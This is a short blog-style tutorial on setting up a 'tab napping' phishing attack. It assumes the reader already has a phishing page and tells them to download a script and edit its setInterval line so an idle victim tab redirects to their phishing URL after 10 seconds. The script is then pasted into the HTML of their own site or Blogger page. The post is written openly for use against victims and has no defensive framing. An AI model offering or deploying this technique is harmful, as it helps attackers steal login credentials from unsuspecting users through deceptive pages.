How to setup a Tab Napping Script
1. Create an Ordinary phisher- First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phisher .
2. Install the Script
- Download the Tab Napping script here
- Open the text file containing the script with a text editor like Notepad and search for the lines below;
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);
- Now in the above script, replace http://username.site.com/fakepage.htm with your phishing url
Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically redirects to your phishing page. Therefore you can modify the idle time too..
10000 milliseconds = 10 seconds
- After you have edited the script, copy and paste it into the HTML of your site or blogger site
0 comments:
Post a Comment